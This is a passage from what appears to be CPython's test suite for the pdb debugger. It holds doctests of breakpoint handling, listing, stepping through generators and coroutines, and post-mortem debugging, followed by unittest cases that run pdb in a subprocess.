1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def test_pdb_breakpoints_preserved_across_interactive_sessions():
"""Breakpoints are remembered between interactive sessions
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'import test.test_pdb',
... 'break test.test_pdb.do_something',
... 'break test.test_pdb.do_nothing',
... 'break',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) import test.test_pdb
(Pdb) break test.test_pdb.do_something
Breakpoint 1 at ...test_pdb.py:...
(Pdb) break test.test_pdb.do_nothing
Breakpoint 2 at ...test_pdb.py:...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'break pdb.find_function',
... 'break',
... 'clear 1',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) break pdb.find_function
Breakpoint 3 at ...pdb.py:94
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 1
Deleted breakpoint 1 at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'clear 2',
... 'clear 3',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 2
Deleted breakpoint 2 at ...test_pdb.py:...
(Pdb) clear 3
Deleted breakpoint 3 at ...pdb.py:...
(Pdb) continue
"""
def test_pdb_pp_repr_exc():
"""Test that do_p/do_pp do not swallow exceptions.
>>> class BadRepr:
... def __repr__(self):
... raise Exception('repr_exc')
>>> obj = BadRepr()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'p obj',
... 'pp obj',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) p obj
*** Exception: repr_exc
(Pdb) pp obj
*** Exception: repr_exc
(Pdb) continue
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_pdb_whatis_command():
"""Test the whatis command
>>> myvar = (1,2)
>>> def myfunc():
... pass
>>> class MyClass:
... def mymethod(self):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'whatis myvar',
... 'whatis myfunc',
... 'whatis MyClass',
... 'whatis MyClass()',
... 'whatis MyClass.mymethod',
... 'whatis MyClass().mymethod',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) whatis myvar
<class 'tuple'>
(Pdb) whatis myfunc
Function myfunc
(Pdb) whatis MyClass
Class test.test_pdb.MyClass
(Pdb) whatis MyClass()
<class 'test.test_pdb.MyClass'>
(Pdb) whatis MyClass.mymethod
Function mymethod
(Pdb) whatis MyClass().mymethod
Method mymethod
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwinding stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwinding stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwinding stack on yield for async generators for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwinding stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwinding stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwinding stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwinding stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
def test_pdb_issue_43318():
"""echo breakpoints cleared with filename:lineno
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
... 'continue'
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) continue
1
2
3
4
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(os_helper.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
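# Note: _run_pdb drives `python -m pdb` in a subprocess, feeds the given
# commands on stdin, merges stderr into stdout, and forces PYTHONIOENCODING
# to utf-8 so the captured output decodes reliably across platforms.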
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
os_helper.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(os_helper.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(os_helper.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], os_helper.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, os_helper.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(os_helper.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', os_helper.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
